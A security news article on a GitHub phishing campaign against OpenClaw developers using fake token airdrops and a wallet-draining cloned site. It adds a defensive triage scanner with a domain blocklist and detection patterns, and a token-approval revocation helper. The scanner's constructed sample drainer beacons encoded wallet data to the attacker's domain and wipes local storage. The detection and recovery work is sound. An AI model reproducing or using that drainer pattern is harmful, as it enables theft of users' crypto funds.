TLDR:
- Attackers created fake GitHub accounts to tag OpenClaw developers with fraudulent $5,000 $CLAW token airdrop offers.
- A cloned openclaw.ai site used obfuscated JavaScript named “eleven.js” to silently drain connected crypto wallets.
- OX Security found a “nuke” function inside the malware that erases wallet-theft data to block forensic investigation.
- The threat actor’s wallet address was identified but showed zero transactions, with no confirmed victims reported yet.
OpenClaw developers are being targeted in an active phishing campaign on GitHub. Security platform OX Security published a report on Wednesday detailing how threat actors are creating fake accounts to lure developers.
The scammers promise $5,000 worth of $CLAW tokens and direct victims to a cloned website. No confirmed victims have been reported yet, but the wallet-draining infrastructure is fully operational.
How the GitHub Phishing Campaign Operates
OpenClaw’s rapid rise to over 323,000 GitHub stars has drawn the attention of bad actors. The framework’s association with OpenAI and prominent developer Peter Steinberger makes its community an attractive target. Scammers are now exploiting that visibility to run a coordinated social engineering campaign.
Threat actors begin by creating fake GitHub accounts and opening issue threads in attacker-controlled repositories.
They then tag dozens of developers, claiming they were selected based on their GitHub activity. The message tells targets, “Appreciate your contributions on GitHub. We analyzed profiles and chose developers to get OpenClaw allocation,” promising $5,000 in $CLAW tokens.
From there, victims are directed to a cloned version of the openclaw.ai website. The fake site closely mirrors the original but includes a “Connect your wallet” button. That button triggers the wallet theft mechanism embedded within the page.
OX Security researchers found the malicious code inside a heavily obfuscated JavaScript file named “eleven.js.” After deobfuscating it, they discovered a built-in “nuke” function that wipes the drainer’s own data from the browser’s local storage, leaving little on the victim’s machine for any forensic analysis that follows.
The malware communicates with a separate command-and-control (C2) server using encoded data. It reports the victim’s progress through the flow with status messages named PromptTx, Approved, and Declined, and relays wallet addresses, transaction values, and usernames back to the attacker in real time.
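For responders who get hold of a copy of a suspected drainer, the behaviours described above are enough to write a first-pass static triage. The script below is an added example written for this article; it is not code from the OX Security report and it is not eleven.js. It scores a deobfuscated script for the wallet-connect prompt, the localStorage “nuke,” encoded beacons, and the PromptTx/Approved/Declined status strings, and defangs any outbound hosts that appear on the report’s blocklist. The indicator weights are this example’s own heuristic, and the SAMPLE it scans is a constructed snippet that merely resembles a drainer flow.

```javascript
// Added example: static triage of a suspected wallet-drainer script.
// Not code from the OX Security report or from eleven.js; the SAMPLE below
// is constructed for this example and is not the real malware.

// Domains the report says to block, used to flag outbound hosts.
const BLOCKLIST = new Set(["token-claw.xyz", "watery-compost.today"]);

// Each indicator is a regex plus a weight (weights are this example's heuristic).
const INDICATORS = [
  { id: "wallet-connect", re: /eth_requestAccounts|window\.ethereum/g, weight: 2 },
  { id: "tx-prompt", re: /eth_sendTransaction|eth_signTypedData|personal_sign/g, weight: 2 },
  { id: "storage-wipe", re: /localStorage\.(clear|removeItem)\s*\(/g, weight: 3 },
  { id: "c2-status", re: /["'](PromptTx|Approved|Declined)["']/g, weight: 3 },
  { id: "encoded-beacon", re: /\b(btoa|atob)\s*\(|fromCharCode/g, weight: 1 },
];

// Count indicator hits and turn the weighted score into a verdict.
function scanScript(source) {
  const hits = {};
  let score = 0;
  for (const ind of INDICATORS) {
    const matches = source.match(ind.re);
    if (matches) {
      hits[ind.id] = matches.length;
      score += ind.weight;
    }
  }
  const verdict = score >= 7 ? "likely-drainer" : score >= 3 ? "suspicious" : "clean";
  return { score, hits, verdict };
}

// Pull every http(s) host out of the script, defang it for reporting, and
// mark whether it is on the blocklist.
function extractHosts(source) {
  const hosts = new Set();
  for (const m of source.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) {
    hosts.add(m[1].toLowerCase());
  }
  return [...hosts].sort().map((h) => ({
    host: h.replace(/\./g, "[.]"),
    blocked: BLOCKLIST.has(h),
  }));
}

// Constructed sample resembling a deobfuscated drainer flow (not eleven.js).
const SAMPLE = `
async function connect() {
  const [addr] = await window.ethereum.request({ method: "eth_requestAccounts" });
  beacon("PromptTx", { addr, value: "0x0" });
  try {
    await window.ethereum.request({ method: "eth_sendTransaction",
      params: [{ from: addr, to: SINK, value: "0x0" }] });
    beacon("Approved", { addr });
  } catch (e) {
    beacon("Declined", { addr });
  }
}
function beacon(cmd, data) {
  fetch("https://watery-compost.today/api", { method: "POST",
    body: btoa(JSON.stringify({ cmd, data })) });
}
function nuke() { localStorage.removeItem("drain"); localStorage.clear(); }
`;

console.log(scanScript(SAMPLE));
console.log(extractHosts(SAMPLE));
```

Run it with Node against a deobfuscated copy of the file in question by replacing SAMPLE with the file contents. A “likely-drainer” verdict is a triage signal, not proof; the point is to surface the storage wipe and C2 status strings quickly so a responder knows to capture browser state before the “nuke” routine has a chance to run.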
What the Research Reveals and How to Stay Protected
OX Security research team lead Moshe Siman Tov Bustan said the campaign bears resemblance to a prior phishing operation that “spread on GitHub, relating to Solana.”
He added that researchers are “[still] analyzing the behavior and the relation of these campaigns.” Confirmation of a direct link between the two is still pending.
Researchers found evidence suggesting the attackers used GitHub’s star feature to pick their targets. Bustan confirmed the campaign targeted only users who “starred the OpenClaw GitHub repository,” which makes the lure feel personalized and therefore more credible to each recipient.
One crypto wallet address, 0x6981E9EA7023a8407E4B08ad97f186A5CBDaFCf5, was identified as belonging to the threat actor.
Bustan noted that “during our analysis, we found only one address belonging to the threat actor, which hadn’t sent or received any funds yet.” The fake accounts were created last week and deleted within hours of launch.
OpenClaw creator Peter Steinberger had previously spoken about crypto spam flooding the project’s Discord “every half hour,” describing it as “nonstop coin promotion.”
That activity eventually led to a blanket ban on coin promotion within the community. The phishing campaign now extends that problem beyond Discord and directly onto GitHub.
OX Security recommends blocking the domains token-claw[.]xyz and watery-compost[.]today immediately. Developers should avoid connecting crypto wallets to unverified or newly surfaced websites.
Any GitHub issue promoting token giveaways should be treated as suspicious, especially when it comes from an unknown account. Anyone who recently connected a wallet to an unfamiliar site should revoke any token approvals granted there without delay.
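“Revoke approvals” in practice means checking each token’s allowance for the spender the site asked you to approve and, if it is non-zero, sending approve(spender, 0). The block below is an added example, not code from the report or from OpenClaw, showing the raw ERC-20 calldata for both steps so a developer can see exactly what a wallet is being asked to sign. The function selectors are the standard first four bytes of keccak256 over the signatures allowance(address,address) and approve(address,uint256); the token, owner, and spender addresses are constructed placeholders, and the provider calls are shown only in comments so the block runs offline.

```javascript
// Added example (not from the OX Security report or OpenClaw): build the
// ERC-20 calls needed to audit and revoke a token allowance after a wallet
// was connected to an untrusted site. Encoding is done offline; the
// provider calls appear in comments at the bottom.
// Standard selectors (first 4 bytes of keccak256 of the signature):
//   allowance(address,address) -> dd62ed3e
//   approve(address,uint256)   -> 095ea7b3
const SEL_ALLOWANCE = "dd62ed3e";
const SEL_APPROVE = "095ea7b3";
// The "unlimited" allowance drainers typically ask a victim to approve.
const UINT256_MAX = (1n << 256n) - 1n;

function isAddress(a) {
  return /^0x[0-9a-fA-F]{40}$/.test(a);
}

// ABI-encode an address as one 32-byte, left-padded word.
function encAddress(addr) {
  if (!isAddress(addr)) throw new Error("bad address: " + addr);
  return addr.slice(2).toLowerCase().padStart(64, "0");
}

// ABI-encode a uint256 as one 32-byte, left-padded word.
function encUint256(n) {
  const v = BigInt(n);
  if (v < 0n || v > UINT256_MAX) throw new Error("uint256 out of range");
  return v.toString(16).padStart(64, "0");
}

// eth_call payload for allowance(owner, spender) on `token`.
function allowanceCall(token, owner, spender) {
  if (!isAddress(token)) throw new Error("bad token: " + token);
  return {
    to: token,
    data: "0x" + SEL_ALLOWANCE + encAddress(owner) + encAddress(spender),
  };
}

// Decode the single 32-byte word returned by allowance() into a BigInt.
function decodeUint256(hexWord) {
  if (!/^0x[0-9a-fA-F]{64}$/.test(hexWord)) throw new Error("expected one 32-byte word");
  return BigInt(hexWord);
}

// Classify an allowance so unlimited approvals get revoked first.
function classifyAllowance(rawWord) {
  const v = decodeUint256(rawWord);
  if (v === 0n) return "none";
  return v === UINT256_MAX ? "unlimited" : "limited";
}

// eth_sendTransaction payload for approve(spender, 0), which revokes the allowance.
function revokeTx(token, from, spender) {
  if (!isAddress(token)) throw new Error("bad token: " + token);
  return {
    from,
    to: token,
    data: "0x" + SEL_APPROVE + encAddress(spender) + encUint256(0),
  };
}

// Constructed placeholders (not real contracts or wallets).
const TOKEN = "0x" + "11".repeat(20);
const ME = "0x" + "22".repeat(20);
const SPENDER = "0x" + "33".repeat(20);

console.log("allowance call:", allowanceCall(TOKEN, ME, SPENDER).data);
console.log("revoke tx:     ", revokeTx(TOKEN, ME, SPENDER).data);

// In a browser with a wallet provider the flow would be (not run here):
//   const raw = await window.ethereum.request({ method: "eth_call",
//     params: [allowanceCall(TOKEN, ME, SPENDER), "latest"] });
//   if (classifyAllowance(raw) !== "none") {
//     await window.ethereum.request({ method: "eth_sendTransaction",
//       params: [revokeTx(TOKEN, ME, SPENDER)] });
//   }
```

The value worth checking before signing the revoke is the calldata: it must start with 095ea7b3, carry the spender in the first word, and end in a zero word. A drainer’s approval request looks the same except that the last word is all f’s (UINT256_MAX), which is what classifyAllowance flags as “unlimited.”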